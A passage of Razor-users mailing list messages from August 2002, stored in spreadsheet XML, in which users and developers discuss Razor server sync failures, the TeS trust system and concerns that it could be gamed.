&gt; This is still happening.  Nothing that I report is being registered at&gt;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did&gt; find that sample-spam.txt from Spamassassin is only registered on 
&gt; honor.cloudmark.net and comes back positive from it and it only so 
&gt; it's clearly not sync'd with apt or fire.
&gt; 
&gt; 
&gt; 
&gt; -----Original Message-----
&gt; From: Rose, Bobby
&gt; Sent: Wednesday, August 07, 2002 1:32 PM
&gt; To: Patrick
&gt; Cc: ML-razor-users
&gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
&gt; 
&gt; 
&gt; I'm sure others have thought of that.  Probably the only way to 
&gt; prevent that is to include the host in the report/revoke 
&gt; authentication.
&gt; 
&gt; -----Original Message-----
&gt; From: Patrick [mailto:patrick@stealthgeeks.net]
&gt; Sent: Wednesday, August 07, 2002 12:33 PM
&gt; To: Rose, Bobby
&gt; Cc: ML-razor-users
&gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
&gt; 
&gt; 
&gt; On Wed, 7 Aug 2002, Rose, Bobby wrote:
&gt; 
&gt; &gt; Well at least it's been confirmed. I can say for cetain that it 
&gt; &gt; started on Monday since that was when I noticed a huge drop in stats
&gt; of messages
&gt; &gt; that were tagged as being in razor.   And I know it was fine on
&gt; Friday.
&gt; &gt; It may have something to do with the upgrades on the servers that 
&gt; &gt; Vipul mentioned.  If TES is going to decide on what gets registered 
&gt; &gt; and what doesn't then razor-report should provide some debug info 
&gt; &gt; about the refusal.  You are correct about the need for more info on 
&gt; &gt; TES, but it probably won't happen for fear of circumvention.
&gt; 
&gt; 
&gt; 
&gt; On the way into work I thought of some fairly easy ways to circumvent 
&gt; what I imagine the current trust model to be based on individual users&gt; blindly submitting reports and checking results.
&gt; 
&gt; It's hard to imagine others haven't as well, as I'm not too bright.
&gt; 
&gt; 
&gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
&gt; /\
&gt; /\/\/\
&gt;                                Patrick Greenwell
&gt;          Asking the wrong questions is the leading cause of wrong
&gt; answers
&gt;
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
&gt; \/\/\/
&gt;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</si>
  <si>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Isn't that why you have whitelisting?-----Original Message-----
From: Will Glynn [mailto:delta407@delta407.homeip.net] 
Sent: Friday, August 09, 2002 12:18 AM
To: razor-users@example.sourceforge.net
Subject: Re: [Razor-users] What's wrong with the Razor servers now?
&gt; Who loses in this case? Why? Neither party is inaccurate in their 
&gt; actions IMO. But someone's standing is going to get hurt because of 
&gt; it.My question for the trust system is this. I signed up for a free accounton some website that gives me free access to a large compilation of
data, 
and in so doing have subscribed myself to their mailing list. The
mailing 
includes a list of new articles and books and so forth as well as a few 
links to their book store.This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spam.Who is losing a trust rating here? If it is not unsolicited commercial
e- mail, it should not be reported by Razor as spam -- correct?--Will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</si>
  <si>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On Thu, Aug 08, 2002 at 08:00:00PM -0700,
Jehan  is thought to have said:&gt; Actually you would be inaccurate in your action in a way. The correct 
&gt; behavior would be to unsubscribe razor-users@fsckit.net from the mailing 
&gt; list.Wow.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lose.That's fine. But my point is that neither person in my example was
committing an inherently untrustworthy act. Yet someone's TES would likely
fall because of it.&gt; Razor is designed for the betterment of most people, i.e. the majority, 
&gt; not for the individual. If one doesn't agree with the majority, he 
&gt; should use the razor-whitelist or create a blacklist (BTW, why doesn't 
&gt; razor provide a razor-blacklist too?)Hmm. Good point about razor-whitelist. I'd forgotten about that.--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</si>
  <si>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Every once in a while, I get notifications in my root mailbox that my
personal mail is being rejected.  The message is 'No Catalogue Servers
available at this time.'  Since I use razor V1 through Mail::Audit
(using is_spam), I tried several ways to try to trap this error and
allow my mail to be delivered on these occassions but nothing seemed
to work.I started digging through the code and found several uses of exit
inside the razor code.  This is a very anti-social thing for a module
to do.  It takes away my option to bypass the spam check and deliver
the mail anyway.  The razor modules should signal errors through die
or warn.  razor-check could catch these and, knowing it's being called
during mail delivery, issue an appropriate message and exit status for
the MTA.  The razor modules don't know who's calling them and
shouldn't make this decision.  I'm wondering how much legitimate mail
I'm missing because of this.I certainly hope this is being addressed in the new version.-- 
tom_p
pfau@nbpfaus.net -- http://www.nbpfaus.net/~pfau/
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1de'i Friday 09 August 2002 01:27 la Steve Price cusku di'e
&gt; On Fri, Aug 09, 2002 at 12:43:39AM -0400, cmeclax po'u le cmevi'u ke'umri 
wrote:
&gt; &gt; I send mail detected by Razor as spam to the spamtrap, which again
&gt; &gt; reports it as spam. Before I added the procmail rule to revoke (as my
&gt; &gt; real life account) Bugtraq messages that were flagged as spam, I manually
&gt; &gt; revoked them as the spamtrap (which keeps the last 32 messages sent to
&gt; &gt; it). Thus the spamtrap both reported as spam and revoked the same
&gt; &gt; message. What happens to its trust rating?
&gt;
&gt; Maybe I'm the only one confused but what you are saying is that you
&gt; have a spamtrap that receives Bugtraq messages and you are auto-
&gt; matically reporting them as SPAM only to revoke them shortly there-
&gt; after???  Either way automatic reporting is a Bad Thing (tm) IMHO.
&gt; You should review and then report spamtrap or otherwise.  I'm not
&gt; sure how this would affect your rating because I don't have any docs
&gt; nor code to look at but I sincerely hope that if that's what you
&gt; are doing that it negatively impacts your rating at a near exponential
&gt; rate with every report/revoke cycle.No, I have another account that sends anything that's already in Razor to the 
spamtrap, unless it's a Bugtraq message, in which case I revoke it as that 
account (not as the spamtrap). I'm talking about the situation before I 
checked for Bugtraq in the procmailrc. The message was sent to the spamtrap 
because it was in Razor, then I manually revoked it as the spamtrap because 
it was erroneously reported. The spamtrap is not, and never was, subscribed 
to Bugtraq.cmeclax
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)iD8DBQE9U67G3/k1hdmG9jMRAssMAJ9zlr8ULek1Dz5GopcyO0GYI9YEVACgqvj1
ziGkuXEpY2RPRP3Q+Rs/sLc=
=VQGl
-----END PGP SIGNATURE-----
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1I send mail detected by Razor as spam to the spamtrap, which again reports it 
as spam. Before I added the procmail rule to revoke (as my real life account) 
Bugtraq messages that were flagged as spam, I manually revoked them as the 
spamtrap (which keeps the last 32 messages sent to it). Thus the spamtrap 
both reported as spam and revoked the same message. What happens to its trust 
rating?Btw, what does "TeS" stand for?cmeclax
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)iD8DBQE9U0iD3/k1hdmG9jMRArnxAKCpw8ZpBWFo3+h7Y2mscN4WER6HEwCfauH9
54LgdFZN2QQONm7awjHKN1c=
=yKwF
-----END PGP SIGNATURE-----
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 12:27:25AM -0500, Steve Price wrote:
&gt; Maybe I'm the only one confused but what you are saying is that you
&gt; have a spamtrap that receives Bugtraq messages and you are auto-
&gt; matically reporting them as SPAM only to revoke them shortly there-
&gt; after???  Either way automatic reporting is a Bad Thing (tm) IMHO.To be more precise, automatic reporting is a Good Thing only if there's
/zero/ possibility of reporting positives falsely (or as close to zero
as makes no difference in the end).cmeclax's example (which incidentally points out a major vulnerability
of auto-reporting trollboxes) basically says "I'll blindly report as
spam whatever some other user(s) have reported as spam".  That "blindly"
part undermines the very purpose of Razor, so I too hope that:&gt; if that's what you are doing that it negatively impacts your rating
&gt; at a near exponential rate with every report/revoke cycle.- Adrian
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 12:43:39AM -0400, cmeclax po'u le cmevi'u ke'umri wrote:
&gt; 
&gt; I send mail detected by Razor as spam to the spamtrap, which again reports it 
&gt; as spam. Before I added the procmail rule to revoke (as my real life account) 
&gt; Bugtraq messages that were flagged as spam, I manually revoked them as the 
&gt; spamtrap (which keeps the last 32 messages sent to it). Thus the spamtrap 
&gt; both reported as spam and revoked the same message. What happens to its trust 
&gt; rating?Maybe I'm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I'm not
sure how this would affect your rating because I don't have any docs
nor code to look at but I sincerely hope that if that's what you
are doing that it negatively impacts your rating at a near exponential
rate with every report/revoke cycle.&gt; Btw, what does "TeS" stand for?Truth Evaluation System.  UTFG.http://www.google.com/search?q=razor+TeS-steve
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Who loses in this case? Why? Neither party is inaccurate in their
&gt; actions IMO. But someone's standing is going to get hurt because of it.My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spam.Who is losing a trust rating here? If it is not unsolicited commercial e-
mail, it should not be reported by Razor as spam -- correct?--Will
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Tabor J. Wells wrote:
&gt; On Fri, Aug 09, 2002 at 10:05:29AM +1000,
&gt; Adam Goryachev  is thought to have said:
&gt; 
&gt; 
&gt;&gt;&gt;Now I get some opt-in mail which looks to me like
&gt;&gt;&gt;spam.  I hit "this is spam".  My trust rating plummets --
&gt;&gt;
&gt;&gt;Good! Your opinion of what is spam is unreliable, and therefore, I don't
&gt;&gt;*want* to trust you. IMHO, that is exactly the case that the trust system is
&gt;&gt;supposed to sort out. People who incorrectly submit non-spam bulk mail to
&gt;&gt;razor.
&gt; 
&gt; 
&gt; Let's take a look at an example here. Someone on this list signed
&gt; razor-users@fsckit.net up to a ZDNet mailing list that doesn't confirm
&gt; subscriptions in a piss-poor attempt to mailbomb me. I report all of these
&gt; mailings to Razor because, guess what, for me this is spam. This and a
&gt; hundred more traditional spam emails to automated spamtrap addresses get 
&gt; reported by me daily. I probably have a decent TES value because of all of
&gt; this.
&gt; 
&gt; Now lets say someone else who is also reporting a fair amount of your
&gt; typical proxy/relayed spam has been reporting these and has built up a
&gt; decent TES rating because of it. However they subscribed to that same ZDNet
&gt; list and enjoy getting the mail from it except that they don't like seeing 
&gt; it tagged as spam by Razor. So they razor-revoke it. 
&gt; 
&gt; Who loses in this case? Why? Neither party is inaccurate in their actions
&gt; IMO. But someone's standing is going to get hurt because of it.Actually you would be inaccurate in your action in a way. The correct 
behavior would be to unsubscribe razor-users@fsckit.net from the mailing 
list.But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i.e. the majority, 
not for the individual. If one doesn't agree with the majority, he 
should use the razor-whitelist or create a blacklist (BTW, why doesn't 
razor provide a razor-blacklist too?)	Jehan-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, Aug 09, 2002 at 10:05:29AM +1000,
Adam Goryachev  is thought to have said:&gt; &gt; Now I get some opt-in mail which looks to me like
&gt; &gt; spam.  I hit "this is spam".  My trust rating plummets --
&gt; 
&gt; Good! Your opinion of what is spam is unreliable, and therefore, I don't
&gt; *want* to trust you. IMHO, that is exactly the case that the trust system is
&gt; supposed to sort out. People who incorrectly submit non-spam bulk mail to
&gt; razor.Let's take a look at an example here. Someone on this list signed
razor-users@fsckit.net up to a ZDNet mailing list that doesn't confirm
subscriptions in a piss-poor attempt to mailbomb me. I report all of these
mailings to Razor because, guess what, for me this is spam. This and a
hundred more traditional spam emails to automated spamtrap addresses get 
reported by me daily. I probably have a decent TES value because of all of
this.Now lets say someone else who is also reporting a fair amount of your
typical proxy/relayed spam has been reporting these and has built up a
decent TES rating because of it. However they subscribed to that same ZDNet
list and enjoy getting the mail from it except that they don't like seeing 
it tagged as spam by Razor. So they razor-revoke it. Who loses in this case? Why? Neither party is inaccurate in their actions
IMO. But someone's standing is going to get hurt because of it.Tabor--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
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1Ok, time for me to pipe in.  :)Honestly, I find it odd that the spam fighting groups aren't working
and playing well, when the common enemy is the spammers, not each
other.  MAPS and ORBS had a battle for a while, and now DCC seems to
have issues with Razor.  Honestly, work on your own stuff, and let's
fix the spam problem, not pull out rulers.In a spam filter, I'm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I'd probably drop this into a bit-bucket, or
                archive it for humor value.  I expect no
                false-positives to be here.        yellow  This may be spam.  A human should decide (and report).        green   This is probably not spam.spamassassin does something useful here, but it only has the is/isn't
switch, not is/maybe/isn't.  That said, razor is but one check in my
spam fighting arsenal, so if it reports "doesn't match known spam"
once in a while for well-known spam, something else will probably get
it.- --Michael
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (NetBSD)
Comment: See http://www.flame.org/~explorer/pgp for my keysiD8DBQE9Uxknl6Nz7kJWYWYRAqZVAKCAD46joOEZbIk+8Hx3ZGkVQ7eGZwCfRB+V
T67XLOPP4vG99Fg2h72gHek=
=Evue
-----END PGP SIGNATURE-----
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">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This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Adam Goryachev wrote:
&gt; Just my $1 worth...Should we trust you more because you're worth $1 instead of the usual 2 
cents?
;)	Jehan-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">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This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Vipul, can I ask questions about SpamNet here?I hope so, here goes.. simple question.  How do you define
username/passwords in spamnet?  I don't see any fields for this option, so
I'm assuming when someone connects with SpamNet for the first time, they're
given a unique ID that they keep until they change to a new Outlook client?It would be nice if you could specify which username/password to use.  I'd
like to share my trust account between my work(outlook) and my personal(mutt)
email accounts.&gt; &gt; Perhaps a feature can be added to razor-report, so that it checks whether a
&gt; &gt; message is spam before it submits it.  If it is spam, then don't send the
&gt; &gt; body, 4 signatures, etc, just up the "rating" for that individual spam.
&gt; 
&gt; Yep, that how razor-agents currently work.
&gt; 
&gt; cheers,
&gt; vipul.
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; -----Original Message-----
&gt; From: razor-users-admin@example.sourceforge.net
&gt; [mailto:razor-users-admin@lists.sourceforge.net]On Behalf Of Craig
&gt; R.Hughes
&gt; On Thursday, August 8, 2002, at 02:28  PM, Vipul Ved Prakash wrote:
&gt;
&gt; I'm not sure I understand.  Let's say I am an honest
&gt; razor-submitter, and I submit lots of stuff that everyone agrees
&gt; is spam.Great, that is very nice of you.&gt; Now I get some opt-in mail which looks to me like
&gt; spam.  I hit "this is spam".  My trust rating plummets --Good! Your opinion of what is spam is unreliable, and therefore, I don't
*want* to trust you. IMHO, that is exactly the case that the trust system is
supposed to sort out. People who incorrectly submit non-spam bulk mail to
razor.&gt; assuming most other people recognized that it was in fact
&gt; something they'd requested.  Now picture that this happens to
&gt; lots of people in the system.Then those lots of people are unreliable, and therefore will all have
minimal trust, but the people with a decent reliability and therefore trust
level will help us all...&gt; Again, it might not be a problem, but I don't think we know
&gt; yet.  It will probably take a little while for there to be
&gt; enough data in the trust system for it to equilibriate (or has
&gt; it been initialized based on all the submissions/revocations
&gt; gathered before it was switched on?).  I suppose we'll know once
&gt; it's equilibriated.  Certainly as of right now, people don't
&gt; think SpamNet is working very well at all, where it had been
&gt; working great a week ago.IMHO, due to the number of messages you are sending, and the way you are
discussing TeS, (considering that you know *nothing* about it), certainly
looks like you are simply trying to throw doubt/negativity onto razor.Personally, I haven't used razor for a few months now because I want to
integrate it into qmail-scanner *without* spam assassin, but haven't had the
time to do that, so even I can't comment on Razor at all.....Vipul &amp; co, I think it would be great if there was more transparency in the
whole server process, ie, if you know there is a problem, then tell all of
us, this will avoid all the stupid "Oh, it isn't working again, and it took
me 324 days to work it out" etc...Just my $1 worth...Regards,
Adam-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Craig, The problems with missing hashes are being addressed I write this. It
should be fixed soon and it has nothing to do with TeS algorithms.cheers,
vipul.On Thu, Aug 08, 2002 at 03:17:52PM -0700, Craig R . Hughes wrote:
&gt; I'm talking specifically about the last ~24 hours where it seems 
&gt; like things have not been working.  People who've been using the 
&gt; Outlook plugin have been telling me they've been seeing really 
&gt; bad performance, which I've been attributing to the problems 
&gt; which have been discussed here and on sa-talk.  I'm not saying 
&gt; it's completely not working, or that it has no chance of being 
&gt; fixed 15 minutes from now, just that it's not currently working, 
&gt; and there have been a number of "hiccup" periods in the last 
&gt; couple months.  Plus, it's hard to deny that we don't know yet 
&gt; if the trust network is going to work or not -- it only just got 
&gt; switched on, and that changeover seems to have corresponded with 
&gt; people noticing things have stopped working right.
&gt; 
&gt; C
&gt; 
&gt; On Thursday, August 8, 2002, at 01:44  PM, Jordan Ritter wrote:
&gt; 
&gt; &gt; On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:
&gt; &gt;
&gt; &gt; # Razor2 seems to have been a long time in coming, [...] and doesn't
&gt; &gt; # currently work.
&gt; &gt;
&gt; &gt; Quite a strong statement, Craig, one which over 30,000 active users a
&gt; &gt; day would strongly disagree with.
&gt; &gt;
&gt; &gt;
&gt; &gt; --jordan
&gt; &gt;
&gt; 
&gt; 
&gt; 
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by:ThinkGeek
&gt; Welcome to geek heaven.
&gt; http://thinkgeek.com/sf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</si>
  <si>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Yeh it sure would be nice to have more info on Tes.  That would end all
the confusion. Can Spamassassin be considered a competing product when it's typically
used in conjunction with Razor?-----Original Message-----
From: Jordan Ritter [mailto:jpr5@darkridge.com] 
Sent: Thursday, August 08, 2002 6:09 PM
To: Craig R . Hughes; razor-users@example.sourceforge.net
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space.Regards,--jordan
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Razor v1 just called a post to the mutt-users mailing list SPAM
with the following signature.        b230a8ed84eb262bed1f2c908703990d3483b55fBTW, is there are another way for us folks still using v1 to
revoke false-positives such as this without posting to the list?Thanks.-steve
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; To reiterate, the idea behind Razor is to turn 1 bit of 
&gt; &gt; information from
&gt; &gt; the user (this message is or isn't spam) into a comprehensive 
&gt; &gt; filteration
&gt; &gt; system. Everything from computation of signatures for content
&gt; &gt; identification, to assignment of confidence and trust, distribution of
&gt; &gt; signatures, etc is done automagically.
&gt; 
&gt; Well, a little more than one bit -- you have to transmit the 
&gt; signature, plus now the entire message body.  Plus your ID.  
&gt; Plus the rights to all intellectual property contained in any 
&gt; email message you submit (I guess technically there are no bits 
&gt; in the rights assignment)Perhaps a feature can be added to razor-report, so that it checks whether a
message is spam before it submits it.  If it is spam, then don't send the
body, 4 signatures, etc, just up the "rating" for that individual spam.
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm one of the 30,000 but it's not working very well this week with the
TES updates and servers not syncing.  -----Original Message-----
From: Jordan Ritter [mailto:jpr5@darkridge.com] 
Sent: Thursday, August 08, 2002 4:45 PM
To: razor-users@example.sourceforge.net
Subject: Re: [Razor-users] What's wrong with the Razor servers now?
On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:# Razor2 seems to have been a long time in coming, [...] and doesn't #
currently work.Quite a strong statement, Craig, one which over 30,000 active users a
day would strongly disagree with.
--jordan
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">If you're an ISP or running a good size mail server and you submit 2-5
thousands messages a day regardless if it's already been submitted,
would your rating go up faster offsetting the drop from revokes?
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Craig, For the most part, 99% times 99% users agree on what is spam. This is the
nature of the spam problem. Now if you were to use a "personal trust"
system, you'd have a huge personal trust group that would include 99% of
the userbase. This means 99% times you'd be coming to the same conclusion,
only after burning several orders of magnitude more CPU cycles. That would
be stupid. Also, it would take several orders of magnitude longer to
bootstrap and reach effectiveness. Sub-optimal in the extreme.As regards to the problems with the "gray" areas you mentioned, servers
recognize such content, and razor-agents can use this information to make
individual determination. Not to mention, users can set a local confidence
level they are confortable with.cheers,
vipul.On Thu, Aug 08, 2002 at 01:09:22PM -0700, Craig R . Hughes wrote:
&gt; By system-trust vs personal trust I don't mean that the system doesn't
&gt; have a trust rating for each user, but rather that each individual has
&gt; one system-wide trust rating. Your trust rating for scoring my mail is
&gt; the same as your trust rating for scoring your own email, or Joe
&gt; Schmoe's email. You may be great at flagging most spam, but just really
&gt; bad at flagging one particular piece of controversial mail which is
&gt; "gray spam" -- ie some people love it, others hate it. Ideally, I should
&gt; have my own personal trust score for you which agrees with my beliefs
&gt; about that controversial mail, rather than the system-wide beliefs. If
&gt; that doesn't happen, then depending on the trust system's weightings,
&gt; there are 3 possibilities:
&gt;
&gt; 1. All "gray" mail is blocked as spam (ie lots of false positives for
&gt;    individual users)
&gt; 2. All "gray" mail is allowed through as nonspam (ie lots of false
&gt;    negatives for individuals)
&gt; 3. The entire trust system collapses because noone is trusted due to
&gt;    conflicting votes about "gray" spam.--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</si>
  <si>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On Thu, Aug 08, 2002 at 03:26:38PM -0700, Chip Paswater wrote:
&gt; 
&gt; Perhaps a feature can be added to razor-report, so that it checks whether a
&gt; message is spam before it submits it.  If it is spam, then don't send the
&gt; body, 4 signatures, etc, just up the "rating" for that individual spam.Yep, that how razor-agents currently work.cheers,
vipul.-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
On Thursday, August 8, 2002, at 09:05  AM, Gregory Sloop wrote:&gt; I agree (I think)....
&gt;
&gt; But gaming the system, for any system, (spamassassin included) is extra
&gt; work.Yes, it's definitely extra work.  The question is how much extra 
work, both up front, and then on an ongoing basis.  I know 
nothing about how the trust system is working (still waiting for 
that long-promised server code to be published), but now that 
it's been turned on, and the more info that's coming out about 
it, the more concerned I'm becoming that it's extremely easy to 
game; that the initial amount of work to set up a gaming agent 
is low, and that once it's set up, it can be "fire and forget" 
in terms of continuing to operate in a way that's not easy to 
distinguish from real user behavior.&gt; Sure, you can find a way to work almost any system, but few 
&gt; users (spammers)
&gt; will actually take the time to game the system.Another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It's not 
clear yet whether this universe is one of those or not.&gt; That means that we might have a system that is less than 100% 
&gt; effective, but
&gt; perfect accuracy and effectiveness comes at a prohibitive cost. 
&gt; (Complex
&gt; systems, time numbing hours of coding etc.)You do need a certain level of accuracy though, or the filter is 
not economically worthwhile.  If you only filter 75% of spam, 
you're wasting your time.  Some people receive on the order of a 
10:1 ratio of spam:real mail -- 75% means the ratio adjusts to 
5:2 which is still shitty.  95% makes it 1:2, which is better.  
99% makes it 1:10 which is quite nice.  As the global ratio of 
spam:mail rises, this problem gets somewhat more important.  
With an order of magnitude worsening of the incoming spam:real 
ratio, 100:1, 99% effective still works OK.  75% effective is 
now really, really shitty.
&gt; I can't vouch for Razor currently, as I'm not at all 
&gt; knowledgeable. But I
&gt; suspect the current route was picked because it was fairly simple to
&gt; impliment, and it (at least some think) should work decently - if not
&gt; completely without fault.Time will tell.  Time will also tell how good the system is at 
adjusting over time to gaming strategies.&gt; I put up with some garbage results in SA, simply because it 
&gt; blocks most of
&gt; my spam, without too many false positives.SA definitely has a non-zero FP rate, and always will have.  I 
would argue that any system will have a non-zero FP rate, 
including the "no filter" filter -- humans make mistakes too 
sometimes!  As spammer strategies evolve over time though, I'm 
fairly sure that SA will be able to adjust and compensate.  If 
spammers figure out how to easily pollute the SpamNet trust 
system, I'm not sure how easy it'll be to replace the trust 
system with something else.&gt; Perhaps Craig is just theorizing, but I just thought I'd offer my two
&gt; ity-bits.Lots of theorizing, most of it based on little data.  The key 
premises I'm worrying about though are:1. Trust system is easy to pollute
2. Trust system is not personal, which makes the assumption that 
all honest voters agree on what constitutes spam
&gt; Somthing simple, and actually implimented, that works 
&gt; reasonably well, is
&gt; better than somthing that works perfectly, but will never be 
&gt; implimented
&gt; because of it's cost. (The rub is that everyone defines 
&gt; "reasonably well" in
&gt; dramatically different ways - *grin* as evidenced my the masses 
&gt; that think
&gt; Microsoft's stuff works "resaonably well" _bah_ - [but it does 
&gt; keep me fully
&gt; employed 'sigh']Razor2 seems to have been a long time in coming, apparently is 
quite resource intensive (judging by Cloudmark's fundraising 
efforts), and doesn't currently work.  It has great promise, and 
I'm hoping that once the wrinkles are worked through, it'll add 
another powerful tool in the war on spam -- I'm just concerned 
that it's getting off on the wrong foot and might not be able to 
recover.C-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; ----- Original Message -----
&gt; Date: Thu, 08 Aug 2002 11:58:36 -0400
&gt; From: wertzscott@cs.com
&gt; To: razor-users@example.sourceforge.net
&gt; Subject: [Razor-users] Using Razor with non-mbox files
&gt;
&gt; Greetings!  I'm new to this list, and new to Razor.  Trying to get it to
compile now (perhaps more on that later), but I'm wondering if it can really
do what I need anyway.  In short my question is whether Razor can process
files directly from sendmail's queues.  Here's the situation.
&gt;You can use a milter with sendmail that will add an X-header labeling the
mail as spam for procmail processing later (see smrazor:
http://www.sapros.com/smrazor/ ). You can modify the .c file to reject the
email instead. I have been using this with sendmail 8.12.5 and Solaris 9
with razor-agents 2.14 quite successfully (barring network/catalogue server
issues) ...Sven-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm talking specifically about the last ~24 hours where it seems 
like things have not been working.  People who've been using the 
Outlook plugin have been telling me they've been seeing really 
bad performance, which I've been attributing to the problems 
which have been discussed here and on sa-talk.  I'm not saying 
it's completely not working, or that it has no chance of being 
